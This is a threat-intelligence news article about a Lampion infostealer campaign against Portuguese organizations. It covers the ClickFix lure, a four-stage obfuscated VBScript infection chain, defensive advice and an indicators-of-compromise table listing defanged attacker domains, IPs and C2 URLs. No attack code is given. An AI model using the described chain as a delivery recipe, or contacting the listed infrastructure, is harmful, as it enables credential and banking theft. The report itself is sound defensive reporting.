A newly identified cyber campaign, orchestrated by actors behind Lampion banking malware, has escalated threats against Portuguese organizations, with a significant uptick observed between late 2024 and early 2025.
The campaign, primarily targeting entities across government, finance, and transportation sectors, is notable for its integration of the emerging “ClickFix” social engineering lure a tactic that manipulates victims into executing malicious system commands under the guise of technical remediation.
Lampion, an infostealer active since at least 2019, continues to evolve its tactics to evade detection and maximize data theft, particularly of sensitive banking information.
The latest attack wave mirrors previous campaigns in target selection and use of heavily obfuscated Visual Basic (VB) scripting, but stands out by adopting the ClickFix method, which has recently gained traction among diverse malware families.
Complex Multi-Stage Infection Chain
According to the Report, the infection sequence commences with a phishing email containing a ZIP archive.
Inside, a malicious HTML document redirects users to a website impersonating the legitimate Portuguese tax authority.
Victims are then prompted to copy and execute a PowerShell command the essence of the ClickFix lure purportedly to “enable file preview” or resolve technical issues.
This command discreetly downloads and launches an obfuscated VBScript from a remote server, igniting a sophisticated, multi-stage attack chain.
Each stage of the malware executes as a separate process, complicating forensic efforts by breaking up the process tree and camouflaging malicious actions as isolated events.
- Stage 1: The initial VBScript, bloated with junk variables and indirect ASCII encoding, writes a second-stage, equally obfuscated script to the system’s temporary directory. Rather than executing directly, it schedules the subsequent stage via a hidden Windows task at a random future time.
- Stage 2: This downloader retrieves another VBScript stager from a cloud-hosted server, disguised as a PHP file.
- Stage 3: A robust, large VBScript (30–50 MB), equipped with evasion and reconnaissance capabilities, checks for security solutions, gathers machine fingerprints, and communicates encoded identifiers to the command-and-control (C2) infrastructure.
- Stage 4: The final payload comprises a massive DLL loader (>700 MB), fetched from a cloud destination, with execution transpiring via a startup-scheduled command and triggered by system reboot. The DLL’s entry point references functions named in Portuguese, diverging from the randomized function identifiers typical of earlier Lampion samples.
While this observed campaign did not ultimately download the final Lampion payload (the relevant code was commented out), the infection chain’s sophistication indicates continued malware development and possible future deployment of more destructive final stages.
Lampion’s reliance on multi-layered obfuscation and staged scheduling, often leveraging scheduled tasks and benign-looking scripts, hinders detection by traditional security tools.
The recent adoption of ClickFix techniques further increases risk by circumventing common user skepticism about macros or executable attachments.
Security specialists recommend proactive user training on ClickFix lures, vigilant monitoring for unusual clipboard and PowerShell activity, and employing behavioral analytics for identifying obfuscated scripting attacks.
Advanced endpoint protection platforms, like Palo Alto Networks Cortex XDR with its VBS Local Analysis Module, have demonstrated heightened efficacy in detecting these variants by recognizing obfuscated script behaviors.
Lampion’s integration of the ClickFix tactic exemplifies the rapid evolution of malware delivery techniques in financial cybercrime.
As criminals adopt increasingly convincing social engineering strategies, organizations – especially in Portuguese-speaking markets must bolster technical and educational defenses to mitigate these advanced persistent threats.
Indicators of Compromise (IOC)
| Type | Value/Description |
|---|---|
| Phishing Email Hash | ee4c8e4cce55bd40afa1fb0bc0eee3d7c23d0ebe2db48c2092e854f6ca1472ce |
| Stage 1 VBS | 4aeb84dd71588a35084109ff5525c7bff2f30e0ed58ce139621b17f2374bdb35 |
| Stage 2 VBS | bba48cf24bb9e6bdcbc79c2241f101e3dd4127ab450e3dbbe1b79fa738f06483 |
| 29b63fcf8e5f08fd12166507b3a85746e3ec685ae0620a124e64125ecd9ccf9b | |
| Stage 3 VBS | 58fe2a7d4435c9c24c98d33aff1110add4bf95add31558f51289a028ddafcc6e |
| 334dfbaefbf7e6301d2385f95d861eb6dae9018c48fb298a2cbf5f364fbcdb2d | |
| 1681c3b88ed315543ac1bf07d258d560cf2f85bfd26c10471d71700eaeb57fb3 | |
| Stage 4 Loader (IPs) | 5.8.9[.]77, 83.242.96[.]159 |
| Domains | Inde-faturas[.]com, autoridade-tributaria[.]com |
| C2 URLs | http://18.116.63[.]61/ifeellike.php, http://18.116.63[.]61/trogloditas.php (and others) |
| C2 Cloud IPs | 18.221.69[.]167, 18.222.97[.]143, 18.116.15[.]129, 18.220.96[.]58, etc. |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates
